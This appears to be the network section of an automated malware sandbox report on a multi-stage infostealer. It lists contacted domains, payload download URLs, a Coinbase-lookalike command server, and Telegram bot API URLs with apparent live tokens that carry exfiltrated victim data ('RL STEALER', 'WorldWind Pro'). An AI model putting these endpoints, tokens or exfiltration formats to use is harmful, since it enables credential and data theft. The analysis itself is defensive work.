                      ipbase.com1%VirustotalBrowse
                      205.12.2.0.in-addr.arpa0%VirustotalBrowse
                      www.igenius.org0%VirustotalBrowse
                      dl.dropboxusercontent.com2%VirustotalBrowse
                      No Antivirus matches
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      edge-block-www-env.dropbox-dns.com
                      162.125.66.15
                      truefalse
                      auth.xn--conbase-sfb.xyz
                      188.114.97.3
                      truetrue
                      ipbase.com
                      172.67.209.71
                      truefalse
                      igenius.org
                      192.3.140.185
                      truetrue
                      pastebin.com
                      172.67.19.24
                      truetrue
                      www.westnilebirdingandsafari.com
                      75.119.203.100
                      truetrue
                        api.ipify.org
                        104.26.13.205
                        truefalse
                        ip-api.com
                        208.95.112.1
                        truefalse
                        api.mylnikov.org
                        172.67.196.114
                        truefalse
                        freegeoip.app
                        188.114.96.3
                        truetrue
                        api.telegram.org
                        149.154.167.220
                        truetrue
                        hrdc.pk
                        64.31.40.18
                        truetrue
                        icanhazip.com
                        104.16.184.241
                        truefalse
                        205.12.2.0.in-addr.arpa
                        unknown
                        unknowntrue
                        dl.dropboxusercontent.com
                        unknown
                        unknowntrue
                        www.igenius.org
                        unknown
                        unknowntrue
                        NameMaliciousAntivirus DetectionReputation
                        http://hrdc.pk/Server.exetrue
                          https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15false
                            https://api.telegram.org/bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendMessage?chat_id=5795480469&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202024-07-06%207:27:25%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20134349%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%201BUBDD%0ARAM:%204095MB%0AHWID:%209C8FCB6779%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%209%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2045%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2030%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=Truefalse
                              http://www.igenius.org/aaa.exetrue
                                https://api.telegram.org/bot7347450494:AAG6CMHwBd3FeRdexRASKIMPj2MuZf6S2dw/sendDocument?chat_id=212019462&caption=====%20RL%20STEALER%20====%20%0A%E2%8F%B0%20Date%20=%3E%2007/06/2024%207:28%0A%F0%9F%92%BBSystem%20=%3E%20Windows%2010%20Pro%20(64%20Bit)%0A%F0%9F%91%A4%20User%20=%3E%20user%0A%F0%9F%86%94%20PC%20=%3E%20134349%0A%F0%9F%8F%B4%20Country%20=%3E%20[United%20States]%0A%F0%9F%94%8D%20IP%20=%3E%208.46.123.33%0A%F0%9F%93%9D%20Language%20=%3E%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0A%F0%9F%94%93%20Antivirus%20=%3E%20Windows%20Defender.%0A%20====%7B%20User%20Data%20%7D====%0A%F0%9F%93%82%20FileGrabber%20=%3E%2081%0A%F0%9F%93%A6%20Telegram%20=%3E%20%E2%9D%8C%0A%F0%9F%92%B8%20Wallets%20=%3E%20%E2%9D%8C%0A%F0%9F%92%AC%20Discord%20=%3E%20%E2%9D%8C%0A%F0%9F%93%A1%20FileZilla:%20%E2%9D%8C%0A%20VimeWorld%20=%3E%20%E2%9D%8C%0A%20====%7B%20VPN%20%7D====%0A%20%E2%88%9F%20NordVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20OpenVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20ProtonVPN%20=%3E%20%E2%9D%8C%0A%20====%7B%20Browsers%20Data%20%7D====%0A%F0%9F%97%9D%20Passwords%20=%3E%200%0A%F0%9F%95%91%20History%20=%3E%209%0A%F0%9F%8D%AA%20Cookies%20=%3E%200%0A%F0%9F%93%9D%20AutoFills%20=%3E%200%0A%F0%9F%92%B3%20CC%20=%3E%200%0A%20====%7B%20Gaming%20%7D====%0A%20%F0%9F%8E%AE%20Steam%20=%3E%20%E2%9D%8C%0A%20==================%0A%20DOMAINS%20DETECTED:%0A%20-%20false
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpfalse
                                    http://schemas.xmlsoap.org/ws/2005/02/sc/sct62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpfalse
                                      https://aka.ms/odirmrexplorer.exe, 00000002.00000000.1785022693.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                                        https://duckduckgo.com/chrome_newtab4BC4.tmp.Client.exe, 0000000A.00000002.2825556691.000000000404E000.00000004.00000800.00020000.00000000.sdmp, tmpBA07.tmp.dat.39.dr, tmp837E.tmp.dat.9.dr, tmp82FD.tmp.dat.9.dr, tmp2237.tmp.dat.10.dr, tmp4DC0.tmp.dat.39.dr, tmp77C6.tmp.dat.6.dr, tmp4E32.tmp.dat.10.dr, tmp767A.tmp.dat.6.drfalse
                                          http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpfalse
                                            https://duckduckgo.com/ac/?q=4BC4.tmp.Client.exe, 0000000A.00000002.2825556691.000000000404E000.00000004.00000800.00020000.00000000.sdmp, tmpBA07.tmp.dat.39.dr, tmp837E.tmp.dat.9.dr, tmp82FD.tmp.dat.9.dr, tmp2237.tmp.dat.10.dr, tmp4DC0.tmp.dat.39.dr, tmp77C6.tmp.dat.6.dr, tmp4E32.tmp.dat.10.dr, tmp767A.tmp.dat.6.drfalse
                                              http://exchanger.ink/api/update2.pack6relog.exe, 00000037.00000002.2852161070.0000023277648000.00000004.00000020.00020000.00000000.sdmpfalse
                                                http://tempuri.org/Entity/Id23ResponseD62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002EF0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    http://tempuri.org/Entity/Id12Response62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      http://auth.xn--conbase-sfb.xyz/api/update.packhttp://auth.xn--conbase-sfb.xyz/api/update2.packhttp:xj40xovMsm.exe, Service_{B955B2CC07A01546086603}.exe.25.dr, zbi[1].exe.0.dr, Service_Microsoft.exe.0.dr, zbi[1].exe.25.dr, Service_Skype.exe.0.dr, Service_Mozilla.exe.0.dr, Service_Adobe.exe.0.dr, {B955B2CC07A01546086603}.exe.0.dr, SystemUpdate.exe.0.dr, Service_com.adobe.dunamis.exe.0.dr, psvhost.exe.0.drfalse
                                                        https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000002.00000000.1787337320.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          http://exchanger.ink/api/update2.pack.relog.exe, 00000035.00000002.2752497355.0000028619D58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            https://auth.xn--conbase-sfb.xyz/event.phphttps://exchanger.ink/event.phpSystemUpdate.exeTaskmgr.exexj40xovMsm.exe, Service_{B955B2CC07A01546086603}.exe.25.dr, zbi[1].exe.0.dr, Service_Microsoft.exe.0.dr, zbi[1].exe.25.dr, Service_Skype.exe.0.dr, Service_Mozilla.exe.0.dr, Service_Adobe.exe.0.dr, {B955B2CC07A01546086603}.exe.0.dr, SystemUpdate.exe.0.dr, Service_com.adobe.dunamis.exe.0.dr, psvhost.exe.0.drfalse
                                                              https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.prefs.js.1.drfalse
                                                                http://tempuri.org/62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  http://tempuri.org/Entity/Id2Response62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    http://www.fontbureau.com/designersaccc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha162AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        http://tempuri.org/Entity/Id21Response62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              http://tempuri.org/Entity/Id6ResponseD62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                https://cex.io/widget/light/100/btc-usdxj40xovMsm.exefalse
                                                                                  https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      https://g.live.com/odclientsettings/Prod.C:edb.log.3.drfalse
                                                                                        https://api.ipif$4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003633000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  https://assets.dropbox.com/www/en-us/illustrations/spot/traffic-u-turn.svg4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003073000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000301F000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000306B000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003023000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000306F000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003067000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003077000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    https://auth.xn--conbase-sfb.xyz/cxj40xovMsm.exe, 00000019.00000002.2617932750.00000229B8D50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      http://tempuri.org/Entity/Id13ResponseD62AB.tmp.build.exe, 00000014.00000002.2394089953.000000000311E000.00000004.00000800.00020000.00000000.sdmp, 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002EF0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wsat/fault62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            http://www.galapagosdesign.com/DPleaseaccc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              http://tempuri.org/Entity/Id15Response62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                http://tempuri.org/Entity/Id14V62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000003023000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  http://www.zhongyicts.com.cnaccc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name3CBD.tmp.Installer.exe, 00000005.00000002.1941590624.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, 4336.tmp.Server.exe, 00000006.00000002.3152347475.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, accc.exe, 0000000B.00000002.3143963860.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, 5087.tmp.update.exe, 0000000E.00000002.2095704106.0000000002A98000.00000004.00000800.00020000.00000000.sdmp, 5E16.tmp.aaa.exe, 00000013.00000002.3142832732.0000000002B7B000.00000004.00000800.00020000.00000000.sdmp, 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.3152328073.0000000002801000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000003.00000003.1807789448.00000214783C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drfalse
                                                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94prefs.js.1.drfalse
                                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                https://github.com/LimerBoy/StormKitty0&fq4336.tmp.Server.exe, 00000006.00000002.3152347475.00000000024C6000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002901000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  https://wns.windows.com/Lexplorer.exe, 00000002.00000002.3176869488.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1790509509.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    https://api.ip.sb/ip62AB.tmp.build.exe, 00000014.00000000.1945315404.0000000000A72000.00000002.00000001.01000000.00000018.sdmp, 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, 62AB.tmp.build.exe.2.drfalse
                                                                                                                                      https://api.telegram.org/bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002EE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        https://api.telegram.org/bot7203427100:AAE4oxY4yahcr0ruK5AXnOIUYn1d9UmUZqs/sendDocument4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.00000000030DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          https://steamcommunity.com/profiles/ASOFTWAREexplorer.exe, 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000000.1890364340.0000000000AC2000.00000002.00000001.01000000.00000010.sdmp, svchost.exe, 00000018.00000002.3174046241.0000000003A15000.00000004.00000800.00020000.00000000.sdmp, jqnnpe.exe, 00000027.00000000.2525684288.0000000000277000.00000002.00000001.01000000.0000001B.sdmp, jqnnpe.exe.24.dr, 4BC4.tmp.Client.exe.2.drfalse
                                                                                                                                            http://tempuri.org/Entity/Id1ResponseD62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000002.00000000.1785022693.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=4BC4.tmp.Client.exe, 0000000A.00000002.2825556691.000000000404E000.00000004.00000800.00020000.00000000.sdmp, tmpBA07.tmp.dat.39.dr, tmp837E.tmp.dat.9.dr, tmp82FD.tmp.dat.9.dr, tmp2237.tmp.dat.10.dr, tmp4DC0.tmp.dat.39.dr, tmp77C6.tmp.dat.6.dr, tmp4E32.tmp.dat.10.dr, tmp767A.tmp.dat.6.drfalse
                                                                                                                                                        http://crl.ver)svchost.exe, 00000003.00000002.3145605822.000002147840F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaprefs.js.1.drfalse
                                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA162AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              http://schemas.datacontract.org/2004/07/System.ServiceModel62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                http://tempuri.org/Entity/Id24Response62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  https://www.ecosia.org/newtab/4BC4.tmp.Client.exe, 0000000A.00000002.2825556691.000000000404E000.00000004.00000800.00020000.00000000.sdmp, tmpBA07.tmp.dat.39.dr, tmp837E.tmp.dat.9.dr, tmp82FD.tmp.dat.9.dr, tmp2237.tmp.dat.10.dr, tmp4DC0.tmp.dat.39.dr, tmp77C6.tmp.dat.6.dr, tmp4E32.tmp.dat.10.dr, tmp767A.tmp.dat.6.drfalse
                                                                                                                                                                    https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        https://cfl.dropboxstatic.com/static/metaserver/static/css/error.css4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003073000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000301F000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000306B000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003023000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000306F000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003067000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003077000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          http://www.carterandcone.comlaccc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                http://tempuri.org/Entity/Id21ResponseD62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/08/addressing62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        https://api.telegram.org/bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendMessage?chat_id=57954476D.tmp.Server.exe, 00000009.00000002.2874806986.000000000298A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            https://api.telegram.org/file/bot4336.tmp.Server.exe, 00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp, 476D.tmp.Server.exe.2.dr, 4336.tmp.Server.exe.2.drfalse
                                                                                                                                                                                              https://outlook.com_explorer.exe, 00000002.00000002.3176869488.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1790509509.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplestmp5A30.tmp.dat.39.dr, tmp1126.tmp.dat.39.dr, tmpB795.tmp.dat.10.dr, tmp835D.tmp.dat.9.dr, tmp7758.tmp.dat.6.dr, tmp361D.tmp.dat.10.dr, tmp7718.tmp.dat.6.dr, tmp836E.tmp.dat.9.drfalse
                                                                                                                                                                                                  http://api.telegram.org3CBD.tmp.Installer.exe, 00000005.00000002.1941590624.00000000034B6000.00000004.00000800.00020000.00000000.sdmp, 4336.tmp.Server.exe, 00000006.00000002.3152347475.00000000025CF000.00000004.00000800.00020000.00000000.sdmp, 4336.tmp.Server.exe, 00000006.00000002.3152347475.0000000002A48000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002E92000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.00000000030F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    http://pastebin.com4336.tmp.Server.exe, 00000006.00000002.3152347475.0000000002A7C000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002E7C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      http://tempuri.org/Entity/Id5Response62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            http://tempuri.org/Entity/Id15ResponseD62AB.tmp.build.exe, 00000014.00000002.2394089953.000000000311E000.00000004.00000800.00020000.00000000.sdmp, 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002EF0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              http://tempuri.org/Entity/Id10Response62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/Renew62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  http://tempuri.org/Entity/Id8Response62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    http://www.founder.com.cn/cn/bTheaccc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmpfalse
